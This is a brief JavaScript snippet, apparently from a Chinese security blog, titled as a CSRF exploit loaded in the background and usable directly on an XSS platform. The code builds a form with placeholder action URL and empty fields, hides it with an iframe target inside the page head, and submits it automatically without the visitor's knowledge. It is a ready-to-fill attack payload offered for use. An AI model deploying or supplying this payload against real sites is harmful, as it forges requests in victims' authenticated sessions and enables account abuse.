// 构造form表单
var frm = document.createElement('form');
frm.action = 'url';
frm.method = 'post';
frm.target = 'iframe';
//设置参数
var i1 = document.createElement('input');
i1.name = '';
i1.value = '';
// 把input放到表单里
frm.appendChild(i1);
// 新建 框架,让表单去框架里跳转 iframe
var ifr = document.createElement('iframe');
ifr.name = 'iframe';
// 把表单添加到head里 隐藏
document.head.appendChild(frm);
document.head.appendChild(ifr);
frm.submit();
CSRF利用js后台加载(可直接放在xss平台上使用)
最新推荐文章于 2022-02-11 23:13:59 发布